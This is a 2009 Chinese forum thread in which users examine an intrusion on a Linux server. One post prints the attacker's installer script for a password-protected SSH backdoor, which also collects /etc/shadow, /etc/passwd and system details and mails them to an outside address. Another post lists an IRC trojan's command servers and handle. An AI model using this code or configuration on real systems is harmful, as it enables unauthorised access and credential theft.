免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
楼主: renfeide112
打印 上一主题 下一主题

本人的linux被攻击了!! [复制链接]

论坛徽章:
0
31 [报告]
发表于 2009-02-22 11:55 |只看该作者
./inst

  1. #!/bin/sh
  2. chattr -Rais /bin /sbin /usr/bin /usr/sbin &>/dev/null
  3. unset HISTFILE
  4. export PATH=/usr/sbin:/sbin:$PATH
  5. pwd=$(pwd)
  6. sshd=$(which sshd)
  7. chown root:root *
  8. if test "$(grep PAM /etc/ssh/sshd_config| grep -v "#")" != "" ; then
  9. OPTS="--with-pam"
  10. fi
  11.         ssh -V 2>test
  12.         ver=`cat test | cut -d "_" -f 2  | cut -d "," -f 1`
  13.         echo "[+] Versiunea curenta de openssh: $ver"
  14.         echo "[+] SSH Daemon se afla in: $sshd"
  15.         echo -n "[+] Daca vrei sa continui instalarea apasa Y ? [y/n]: "
  16.         read do
  17.         if [ "$do" = "y" ]; then
  18.                 ok=1
  19.         fi
  20.         if [ "$do" = "n" ]; then
  21.                 ok=0
  22.                 echo -n "  [+]Te descurci sau dai un mail la [email]mihai1ro@yahoo.com[/email]? [y/n]"
  23.                 read s
  24.                 if [ $"s" = "y" ]; then
  25.                         sok=1
  26.                 fi
  27.         fi
  28.          while [ "$pass" = "" ]; do
  29.                  echo -ne "[+] Scrie Parola pt SSHD Backdoor: \033[30m\00"
  30.                  read pass
  31.                  echo -ne "\033[0m\00"
  32.          done

  33. #  saving yewr little conf in backdoor.h
  34.         echo -e "[+] Stergem Configuratie Actuala"
  35.         rm -rf apps/ssh/genx.h
  36.         rm -rf apps/ssh/ssh2version.h
  37.         echo -e "[+] Configuratia a Fost Stearsa"
  38.         echo -e "[+] Se creaza Noua Configuratie"
  39.         echo "int genx=0,genxlookup=0;" >> apps/ssh/genx.h
  40.         echo "char genxpass[]=\"$pass\",genxbuf[1024];" >> apps/ssh/genx.h
  41.         echo "char genxfile[]=\"/dev/linux\";" >> apps/ssh/genx.h
  42.         echo "#define SSH2_VERSION       \"OpenSSH_$ver\"" > apps/ssh/ssh2version.h

  43.                 echo -e "[+] Salvam configuratia serverului"
  44.                 echo -e "  * uname -a" >>/tmp/.l
  45.                 echo >>/tmp/.l
  46.                 uname -a >>/tmp/.l
  47.                 echo >>/tmp/.l
  48.                 echo -e "  * the ips" >>/tmp/.l
  49.                 /sbin/ifconfig | grep inet >> /tmp/.l
  50.                 echo -e "  * Shadow file" >>/tmp/.l
  51.                 echo >>/tmp/.l
  52.                 cat /etc/passwd >> /tmp/.l
  53.                 cat /etc/shadow >> /tmp/.l
  54.                 echo -e "  * Proc info" >>/tmp/.l
  55.                 echo >>/tmp/.l
  56.                 cat /proc/cpuinfo >>/tmp/.l
  57.                 echo -e "  * Distro and shit Kasandro">>/tmp/.l
  58.                 echo >>/tmp/.l
  59.                 cat /proc/version >>/tmp/.l
  60.                 cat apps/ssh/genx.h >>/tmp/.l
  61.                 cat /tmp/.l | mail -s "root mail" [email]mihai1ro@yahoo.com[/email]
  62.                 rm -rf /tmp/.l
复制代码

论坛徽章:
0
32 [报告]
发表于 2009-02-22 12:00 |只看该作者
谁能拿到这个 mihai1ro@yahoo.com 邮箱?

说不定会有惊喜哦,呵呵~~~~~~~~~~~~

论坛徽章:
3
CU大牛徽章
日期:2013-03-13 15:29:07CU大牛徽章
日期:2013-03-13 15:29:49CU大牛徽章
日期:2013-03-13 15:30:19
33 [报告]
发表于 2009-02-22 16:25 |只看该作者
平时还是需要注意安全的呀。

论坛徽章:
0
34 [报告]
发表于 2009-02-22 19:27 |只看该作者
比较纳闷,不是删除了所有的记录吗?你怎么还能看到历史记录,看样子攻击者很菜。

论坛徽章:
36
IT运维版块每日发帖之星
日期:2016-04-10 06:20:00IT运维版块每日发帖之星
日期:2016-04-16 06:20:0015-16赛季CBA联赛之广东
日期:2016-04-16 19:59:32IT运维版块每日发帖之星
日期:2016-04-18 06:20:00IT运维版块每日发帖之星
日期:2016-04-19 06:20:00每日论坛发贴之星
日期:2016-04-19 06:20:00IT运维版块每日发帖之星
日期:2016-04-25 06:20:00IT运维版块每日发帖之星
日期:2016-05-06 06:20:00IT运维版块每日发帖之星
日期:2016-05-08 06:20:00IT运维版块每日发帖之星
日期:2016-05-13 06:20:00IT运维版块每日发帖之星
日期:2016-05-28 06:20:00每日论坛发贴之星
日期:2016-05-28 06:20:00
35 [报告]
发表于 2009-02-22 19:37 |只看该作者
原帖由 veking 于 2009-2-22 11:34 发表
在windows下,有卡巴无法下载那个压缩包。。。。被卡巴检测出包含病毒


sshd.jpg  这个似乎真的是个图片?
从浏览器上看不出来,可能解压后就不是图片了。。。。没测试


呵呵,只是改了后缀名。Linux不需要通过后缀名区分文件类型的。看一下用tar来执行这个.jpg就感觉应该是tar文件了

论坛徽章:
0
36 [报告]
发表于 2009-02-23 09:11 |只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

论坛徽章:
0
37 [报告]
发表于 2009-02-23 12:11 |只看该作者
管它改什么后缀后,骗不过 file 命令的
学习了

论坛徽章:
0
38 [报告]
发表于 2009-02-23 13:23 |只看该作者
来自 罗马尼亚

http://translate.google.cn/translate_t?hl=zh-CN#ro|en|Te descurci sau dai un mail la

通过sshd来架后门,主义不错。呵呵

seed 那个就是定时执行吧。一会儿看看。

论坛徽章:
0
39 [报告]
发表于 2009-02-23 13:39 |只看该作者
哈哈 chinaunix强淫一大堆啊

论坛徽章:
0
40 [报告]
发表于 2009-02-23 13:41 |只看该作者
doru[1].jpg.tar.gz 这个包是IRC木马

SERVER 195.197.175.21 7000
SERVER 195.204.1.132 6667
SERVER 193.109.122.67 6667
SERVER 216.152.77.10 6667
SERVER  193.110.95.1 8000
SERVER  66.198.160.2 8888
SERVER 69.16.172.34 6667

handle dorin
mask *!*@IngerBun.users.undernet.org
channel *
access 100
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP